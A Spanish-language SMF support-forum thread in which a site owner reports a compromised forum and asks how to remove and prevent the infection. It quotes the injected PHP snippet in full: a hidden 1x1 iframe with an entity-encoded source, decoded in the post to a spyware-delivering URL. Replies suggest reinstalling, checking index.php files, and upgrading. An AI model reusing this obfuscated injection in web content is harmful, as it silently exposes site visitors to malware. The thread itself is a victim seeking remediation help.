Eliminar Código Malicioso del foro.

Started by slmnkanaya, April 14, 2008, 11:34:37 AM

Previous topic - Next topic

slmnkanaya

Tengo un foro SMF 1.1 RC2 funcionando perfectamente hasta ..... hace unos días. Todas las páginas contienen el siguiente código:
<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?> que corresponde a :
"http://cdpuvbhfzz.com/dl/adv598.php" que parece ser instala en el ordenador de los visitantes un programa spyware....
Estoy intentando reparar el  foro y en última instancia lo reinstalaré pero ¿Cómo puedo evitar que se repita el problema? ¿Dónde está el fallo de instalación que permite la inserción del código?

Enjel

Valla... creo que deberías de borrar todo el foro y si tienes un backup instalarlo de nuevo. Sí no, busca el esa carpeta. dl? no creo que halla ningún directorio en smf con ese nombre, así que borra ese directorio y mira todos los index.php (del inicio y del template) haber si hay colado algún tipo de llamada a tal código.
La vida es una aplastante derrota tras otra hasta que acabas deseando que se muera Flanders.
Who is repair_settings?

franklinrony

haz un upgrade, recuerda que cada version del smf corrige bugs improtantes
http://twitter.com/franklinrony

Entra y aprende a ser un webmaster
www.sv-blog.com
--Si pides ayuda al menos agradece el soporte recibido----

Advertisement: